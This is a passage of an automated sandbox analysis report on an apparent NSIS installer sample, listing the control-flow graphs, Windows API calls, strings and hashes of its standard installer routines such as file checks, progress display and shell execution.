                                                                                                                                                                                                                                                                                              • Part of subcall function 00405E7C: GetFileAttributesW.KERNELBASE(00000003,004035F3,004EB0D8,80000000,00000003,?,?,?,00000000,00403A73,?), ref: 00405E80
                                                                                                                                                                                                                                                                                              • Part of subcall function 00405E7C: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A73,?), ref: 00405EA2
                                                                                                                                                                                                                                                                                            • GetFileSize.KERNEL32(00000000,00000000,004EF0E0,00000000,004DB0B8,004DB0B8,004EB0D8,004EB0D8,80000000,00000003,?,?,?,00000000,00403A73,?), ref: 0040362C
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            • Inst, xrefs: 00403698
                                                                                                                                                                                                                                                                                            • soft, xrefs: 004036A1
                                                                                                                                                                                                                                                                                            • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 004037F1
                                                                                                                                                                                                                                                                                            • Null, xrefs: 004036AA
                                                                                                                                                                                                                                                                                            • Error launching installer, xrefs: 00403603
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1692748467.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1692728633.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1692777079.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1692795954.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1692795954.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1692795954.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1692795954.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1692916425.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_lem.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: File$AttributesCountCreateModuleNameSizeTick
                                                                                                                                                                                                                                                                                            • String ID: Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                                                                                                                                                                                                                                                                            • API String ID: 4283519449-527102705
                                                                                                                                                                                                                                                                                            • Opcode ID: 1c468bae64f21cc984bb13b12bce4b19fca03feff63e1d2e4bd855413efb252c
                                                                                                                                                                                                                                                                                            • Instruction ID: dd9ffda97dac1e18d9081c595fe0b3a994810ea71df15e1d022794f6b5594c79
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1c468bae64f21cc984bb13b12bce4b19fca03feff63e1d2e4bd855413efb252c
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8551B8B1900214AFDB20DFA5DC85B9E7EACAB1435AF60857BF905B72D1C7389E408B5C

                                                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                                                                            control_flow_graph 654 40337f-403398 655 4033a1-4033a9 654->655 656 40339a 654->656 657 4033b2-4033b7 655->657 658 4033ab 655->658 656->655 659 4033c7-4033d4 call 403336 657->659 660 4033b9-4033c2 call 403368 657->660 658->657 664 4033d6 659->664 665 4033de-4033e5 659->665 660->659 666 4033d8-4033d9 664->666 667 403546-403548 665->667 668 4033eb-403432 GetTickCount 665->668 671 403567-40356b 666->671 669 40354a-40354d 667->669 670 4035ac-4035af 667->670 672 403564 668->672 673 403438-403440 668->673 674 403552-40355b call 403336 669->674 675 40354f 669->675 676 4035b1 670->676 677 40356e-403574 670->677 672->671 678 403442 673->678 679 403445-403453 call 403336 673->679 674->664 687 403561 674->687 675->674 676->672 682 403576 677->682 683 403579-403587 call 403336 677->683 678->679 679->664 688 403455-40345e 679->688 682->683 683->664 691 40358d-40359f WriteFile 683->691 687->672 690 403464-403484 call 4076a0 688->690 697 403538-40353a 690->697 698 40348a-40349d GetTickCount 690->698 693 4035a1-4035a4 691->693 694 40353f-403541 691->694 693->694 696 4035a6-4035a9 693->696 694->666 696->670 697->666 699 4034e8-4034ec 698->699 700 40349f-4034a7 698->700 701 40352d-403530 699->701 702 4034ee-4034f1 699->702 703 4034a9-4034ad 700->703 704 4034af-4034e0 MulDiv wsprintfW call 404f9e 700->704 701->673 708 403536 701->708 706 403513-40351e 702->706 707 4034f3-403507 WriteFile 702->707 703->699 703->704 709 4034e5 704->709 711 403521-403525 706->711 707->694 710 403509-40350c 707->710 708->672 709->699 710->694 712 40350e-403511 710->712 711->690 713 40352b 711->713 712->711 713->672
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • GetTickCount.KERNEL32 ref: 004033F1
                                                                                                                                                                                                                                                                                            • GetTickCount.KERNEL32 ref: 00403492
                                                                                                                                                                                                                                                                                            • MulDiv.KERNEL32(7FFFFFFF,00000064,?), ref: 004034BB
                                                                                                                                                                                                                                                                                            • wsprintfW.USER32 ref: 004034CE
                                                                                                                                                                                                                                                                                            • WriteFile.KERNELBASE(00000000,00000000,00424579,00403792,00000000), ref: 004034FF
                                                                                                                                                                                                                                                                                            • WriteFile.KERNEL32(00000000,00420170,?,00000000,00000000,00420170,?,000000FF,00000004,00000000,00000000,00000000), ref: 00403597
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1692748467.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1692728633.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1692777079.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1692795954.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1692795954.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1692795954.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1692795954.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1692916425.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_lem.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: CountFileTickWrite$wsprintf
                                                                                                                                                                                                                                                                                            • String ID: (]C$... %d%%$pAB$yEB
                                                                                                                                                                                                                                                                                            • API String ID: 651206458-486274953
                                                                                                                                                                                                                                                                                            • Opcode ID: a825d6787153bf0de4e2119c04a804022ac971a8914dbc6ec561ebe6254ceb78
                                                                                                                                                                                                                                                                                            • Instruction ID: 38da17626370685da8d32df628044978fcb9abff53cdf920ebdff1c577d6aec0
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a825d6787153bf0de4e2119c04a804022ac971a8914dbc6ec561ebe6254ceb78
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: BE615D71900219EBCF10DF69ED8469E7FBCAB54356F10413BE810B72A0D7789E90CBA9

                                                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                                                                            control_flow_graph 714 404f9e-404fb1 715 404fb7-404fca 714->715 716 40506e-405070 714->716 717 404fd5-404fe1 lstrlenW 715->717 718 404fcc-404fd0 call 406831 715->718 720 404fe3-404ff3 lstrlenW 717->720 721 404ffe-405002 717->721 718->717 722 404ff5-404ff9 lstrcatW 720->722 723 40506c-40506d 720->723 724 405011-405015 721->724 725 405004-40500b SetWindowTextW 721->725 722->721 723->716 726 405017-405059 SendMessageW * 3 724->726 727 40505b-40505d 724->727 725->724 726->727 727->723 728 40505f-405064 727->728 728->723
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • lstrlenW.KERNEL32(00445D80,00424579,74DF23A0,00000000), ref: 00404FD6
                                                                                                                                                                                                                                                                                            • lstrlenW.KERNEL32(004034E5,00445D80,00424579,74DF23A0,00000000), ref: 00404FE6
                                                                                                                                                                                                                                                                                            • lstrcatW.KERNEL32(00445D80,004034E5,004034E5,00445D80,00424579,74DF23A0,00000000), ref: 00404FF9
                                                                                                                                                                                                                                                                                            • SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059
                                                                                                                                                                                                                                                                                              • Part of subcall function 00406831: GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,00424579,74DF23A0,00000000), ref: 00406902
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1692748467.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1692728633.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1692777079.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1692795954.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1692795954.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1692795954.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1692795954.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1692916425.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_lem.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: MessageSend$lstrlen$TextVersionWindowlstrcat
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 2740478559-0
                                                                                                                                                                                                                                                                                            • Opcode ID: 3275530aef0c04b4202250623e45ea8dce7054cefbb9f1e0f944281260c15b48
                                                                                                                                                                                                                                                                                            • Instruction ID: 2ad3572104664f977ebc3f2c903ed8e4223e657edd1a0c85de02785a0cf57670
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3275530aef0c04b4202250623e45ea8dce7054cefbb9f1e0f944281260c15b48
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: CD219DB1800518BBDF119F65CD849CFBFB9EF45714F10803AF905B22A1C7794A909B98

                                                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                                                                            control_flow_graph 729 401eb9-401ec4 730 401f24-401f26 729->730 731 401ec6-401ec9 729->731 732 401f53-401f7b GlobalAlloc call 406831 730->732 733 401f28-401f2a 730->733 734 401ed5-401ee3 call 4062cf 731->734 735 401ecb-401ecf 731->735 750 4030e3-4030f2 732->750 751 402387-40238d GlobalFree 732->751 736 401f3c-401f4e call 406035 733->736 737 401f2c-401f36 call 4062cf 733->737 747 401ee4-402702 call 406831 734->747 735->731 738 401ed1-401ed3 735->738 736->751 737->736 738->734 742 401ef7-402e50 call 406035 * 3 738->742 742->750 762 402708-40270e 747->762 751->750 762->750
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                              • Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042
                                                                                                                                                                                                                                                                                            • GlobalFree.KERNELBASE(00000000), ref: 00402387
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1692748467.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1692728633.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1692777079.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1692795954.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1692795954.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1692795954.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1692795954.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1692916425.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_lem.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: FreeGloballstrcpyn
                                                                                                                                                                                                                                                                                            • String ID: Exch: stack < %d elements$Pop: stack empty$open
                                                                                                                                                                                                                                                                                            • API String ID: 1459762280-1711415406
                                                                                                                                                                                                                                                                                            • Opcode ID: f687fe266335390464c7bf33a5a6109902a608d988a78738c483845962ee8b52
                                                                                                                                                                                                                                                                                            • Instruction ID: 50a08f61e59307d203ec8fda99e8a78aa4432658e9e299f93ea532572e85a124
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f687fe266335390464c7bf33a5a6109902a608d988a78738c483845962ee8b52
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4921FF72640001EBD710EF98DD81A6E77A8AA04358720413BF503F32E1DB799C11966D

                                                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                                                                            control_flow_graph 764 4022fd-402325 call 40145c GetFileVersionInfoSizeW 767 4030e3-4030f2 764->767 768 40232b-402339 GlobalAlloc 764->768 768->767 770 40233f-40234e GetFileVersionInfoW 768->770 772 402350-402367 VerQueryValueW 770->772 773 402384-40238d GlobalFree 770->773 772->773 774 402369-402381 call 405f7d * 2 772->774 773->767 774->773
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • GetFileVersionInfoSizeW.VERSION(00000000,?,000000EE), ref: 0040230C
                                                                                                                                                                                                                                                                                            • GlobalAlloc.KERNEL32(00000040,00000000,00000000,?,000000EE), ref: 0040232E
                                                                                                                                                                                                                                                                                            • GetFileVersionInfoW.VERSION(?,?,?,00000000), ref: 00402347
                                                                                                                                                                                                                                                                                            • VerQueryValueW.VERSION(?,00409838,?,?,?,?,?,00000000), ref: 00402360
                                                                                                                                                                                                                                                                                              • Part of subcall function 00405F7D: wsprintfW.USER32 ref: 00405F8A
                                                                                                                                                                                                                                                                                            • GlobalFree.KERNELBASE(00000000), ref: 00402387
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1692748467.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1692728633.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1692777079.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1692795954.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1692795954.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1692795954.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1692795954.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1692916425.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_lem.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: FileGlobalInfoVersion$AllocFreeQuerySizeValuewsprintf
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 3376005127-0
                                                                                                                                                                                                                                                                                            • Opcode ID: 606da6def6221d12ef1392d662ca92edf1c337adf5941d48ecd243ca57024968
                                                                                                                                                                                                                                                                                            • Instruction ID: 214764af72b390ffa64cdeb44d1c6cd0e8ca06a9e3a7070d0c65f9f565939ffa
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 606da6def6221d12ef1392d662ca92edf1c337adf5941d48ecd243ca57024968
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0D112572A0010AAFDF00EFA1D9459AEBBB8EF08344B10447AF606F61A1D7798A40CB18

                                                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                                                                            control_flow_graph 780 402b23-402b37 GlobalAlloc 781 402b39-402b49 call 401446 780->781 782 402b4b-402b6a call 40145c WideCharToMultiByte lstrlenA 780->782 787 402b70-402b73 781->787 782->787 788 402b93 787->788 789 402b75-402b8d call 405f96 WriteFile 787->789 791 4030e3-4030f2 788->791 789->788 795 402384-40238d GlobalFree 789->795 795->791
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • GlobalAlloc.KERNEL32(00000040,00002004), ref: 00402B2B
                                                                                                                                                                                                                                                                                            • WideCharToMultiByte.KERNEL32(?,?,004100F0,000000FF,?,00002004,?,?,00000011), ref: 00402B61
                                                                                                                                                                                                                                                                                            • lstrlenA.KERNEL32(?,?,?,004100F0,000000FF,?,00002004,?,?,00000011), ref: 00402B6A
                                                                                                                                                                                                                                                                                            • WriteFile.KERNEL32(00000000,?,?,00000000,?,?,?,?,004100F0,000000FF,?,00002004,?,?,00000011), ref: 00402B85
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1692748467.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1692728633.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1692777079.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1692795954.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1692795954.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1692795954.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1692795954.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1692916425.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_lem.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: AllocByteCharFileGlobalMultiWideWritelstrlen
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 2568930968-0
                                                                                                                                                                                                                                                                                            • Opcode ID: 8e94f5e6955cf742f0be7e70fe548515adb6d38661ae1e1cc5866dac39eea37a
                                                                                                                                                                                                                                                                                            • Instruction ID: eb70b36e00a6049791e454e439637436730f967712bedb277b0d85a94317bb29
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 8e94f5e6955cf742f0be7e70fe548515adb6d38661ae1e1cc5866dac39eea37a
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7F016171600205FFEB14AF60DD4CE9E3B78EB05359F10443AF606B91E2D6799D81DB68

                                                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                                                                            control_flow_graph 797 402713-40273b call 406035 * 2 802 402746-402749 797->802 803 40273d-402743 call 40145c 797->803 805 402755-402758 802->805 806 40274b-402752 call 40145c 802->806 803->802 809 402764-40278c call 40145c call 4062cf WritePrivateProfileStringW 805->809 810 40275a-402761 call 40145c 805->810 806->805 810->809
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                              • Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042
                                                                                                                                                                                                                                                                                            • WritePrivateProfileStringW.KERNEL32(?,?,?,00000000), ref: 0040278C
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1692748467.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1692728633.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1692777079.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1692795954.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1692795954.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1692795954.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1692795954.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1692916425.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_lem.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: PrivateProfileStringWritelstrcpyn
                                                                                                                                                                                                                                                                                            • String ID: <RM>$WriteINIStr: wrote [%s] %s=%s in %s$open
                                                                                                                                                                                                                                                                                            • API String ID: 247603264-1827671502
                                                                                                                                                                                                                                                                                            • Opcode ID: c5828c37d5dac6f57dc8390ef1c26791cf4c32ef29eebf51540eb2f0813f71ea
                                                                                                                                                                                                                                                                                            • Instruction ID: 073f588d32262f2f2aee4dc53e9f390c64699363c3e1a285ed73a3087a8005e5
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c5828c37d5dac6f57dc8390ef1c26791cf4c32ef29eebf51540eb2f0813f71ea
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: FF014471D4022AABCB117FA68DC99EE7978AF08345B10403FF115761E3D7B80940CBAD

                                                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                                                                            control_flow_graph 818 4021b5-40220b call 40145c * 4 call 404f9e ShellExecuteW 829 402223-4030f2 call 4062cf 818->829 830 40220d-40221b call 4062cf 818->830 830->829
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                              • Part of subcall function 00404F9E: lstrlenW.KERNEL32(00445D80,00424579,74DF23A0,00000000), ref: 00404FD6
                                                                                                                                                                                                                                                                                              • Part of subcall function 00404F9E: lstrlenW.KERNEL32(004034E5,00445D80,00424579,74DF23A0,00000000), ref: 00404FE6
                                                                                                                                                                                                                                                                                              • Part of subcall function 00404F9E: lstrcatW.KERNEL32(00445D80,004034E5,004034E5,00445D80,00424579,74DF23A0,00000000), ref: 00404FF9
                                                                                                                                                                                                                                                                                              • Part of subcall function 00404F9E: SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
                                                                                                                                                                                                                                                                                              • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
                                                                                                                                                                                                                                                                                              • Part of subcall function 00404F9E: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
                                                                                                                                                                                                                                                                                              • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059
                                                                                                                                                                                                                                                                                            • ShellExecuteW.SHELL32(?,00000000,00000000,00000000,004D70B0,?), ref: 00402202
                                                                                                                                                                                                                                                                                              • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                                                                                                                                              • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            • ExecShell: success ("%s": file:"%s" params:"%s"), xrefs: 00402226
                                                                                                                                                                                                                                                                                            • ExecShell: warning: error ("%s": file:"%s" params:"%s")=%d, xrefs: 00402211
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1692748467.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1692728633.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1692777079.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1692795954.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1692795954.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1692795954.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1692795954.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1692916425.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_lem.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: MessageSendlstrlen$ExecuteShellTextWindowlstrcatwvsprintf
                                                                                                                                                                                                                                                                                            • String ID: ExecShell: success ("%s": file:"%s" params:"%s")$ExecShell: warning: error ("%s": file:"%s" params:"%s")=%d
                                                                                                                                                                                                                                                                                            • API String ID: 3156913733-2180253247
                                                                                                                                                                                                                                                                                            • Opcode ID: 90e3c086b79b93c3d546270fca5f8a0155083991d9bd97c4b180a1ab42e6237a
                                                                                                                                                                                                                                                                                            • Instruction ID: 745ed8f2a75272e62c3db2eabdadd847eb541a5ed47e1f4d533bb28834579f01
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 90e3c086b79b93c3d546270fca5f8a0155083991d9bd97c4b180a1ab42e6237a
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: CD01F7B2B4021076D72076B69C87FAB2A5CDB81768B20447BF502F60D3E57D8C40D138

                                                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                                                                            • Not Executed
